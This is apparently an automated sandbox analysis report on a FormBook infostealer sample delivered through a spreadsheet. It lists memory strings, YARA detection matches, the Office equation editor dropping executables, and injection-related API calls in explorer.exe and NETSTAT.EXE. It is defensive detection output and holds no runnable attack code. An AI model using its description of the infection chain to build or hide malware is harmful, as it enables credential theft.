              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
              Source: explorer.exe, 00000007.00000000.2195116890.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
              Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
              Source: vbc.exe, vbc.exe, 00000005.00000000.2173313353.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2218672810.0000000000CF2000.00000020.00020000.sdmpString found in binary or memory: http://validator.w3.org/check?uri=referer
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
              Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
              Source: explorer.exe, 00000007.00000002.2380506193.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico

              E-Banking Fraud:

              Yara detected FormBook
              Source: Yara match File source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

              System Summary:

              Malicious sample detected (through community Yara rule)
              Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              .NET source code contains very large strings
              Source: svchost[1].2.dr, frmRazor.cs Long String: Length: 13656
              Source: 4.2.vbc.exe.cf0000.2.unpack, frmRazor.cs Long String: Length: 13656
              Source: 4.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Long String: Length: 13656
              Source: 5.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Long String: Length: 13656
              Source: 5.2.vbc.exe.cf0000.0.unpack, frmRazor.cs Long String: Length: 13656
              Source: 6.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Long String: Length: 13656
              Source: 6.2.vbc.exe.cf0000.4.unpack, frmRazor.cs Long String: Length: 13656
              Office equation editor drops PE file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1]
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
              Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
              Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Memory allocated: 76E20000 page execute and read and write
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Memory allocated: 76D20000 page execute and read and write
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFF34 NtQueueApcThread,8_2_021CFF34
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFFFC NtCreateProcessEx,8_2_021CFFFC
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFC30 NtOpenProcess,8_2_021CFC30
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFC48 NtSetInformationFile,8_2_021CFC48
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D0C40 NtGetContextThread,8_2_021D0C40
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFC90 NtUnmapViewOfSection,8_2_021CFC90
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFD5C NtEnumerateKey,8_2_021CFD5C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D1D80 NtSuspendThread,8_2_021D1D80
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9D60 NtCreateFile,8_2_000D9D60
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9E10 NtReadFile,8_2_000D9E10
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9E90 NtClose,8_2_000D9E90
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9F40 NtAllocateVirtualMemory,8_2_000D9F40
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9D1C NtCreateFile,8_2_000D9D1C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9D62 NtCreateFile,8_2_000D9D62
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9DB2 NtReadFile,8_2_000D9DB2
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D9E0A NtReadFile,8_2_000D9E0A
              Source: Booking.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 021DE2A8 appears 38 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 021DDF5C appears 113 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0222373B appears 238 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 02223F92 appears 108 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0224F970 appears 81 times
              Source: C:\Users\Public\vbc.exe Code function: String function: 0095E2A8 appears 38 times
              Source: C:\Users\Public\vbc.exe Code function: String function: 0095DF5C appears 119 times
              Source: C:\Users\Public\vbc.exe Code function: String function: 009CF970 appears 81 times
              Source: C:\Users\Public\vbc.exe Code function: String function: 009A3F92 appears 132 times
              Source: C:\Users\Public\vbc.exe Code function: String function: 009A373B appears 238 times
              Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: svchost[1].2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: svchost[1].2.dr, frmRazor.cs Base64 encoded string
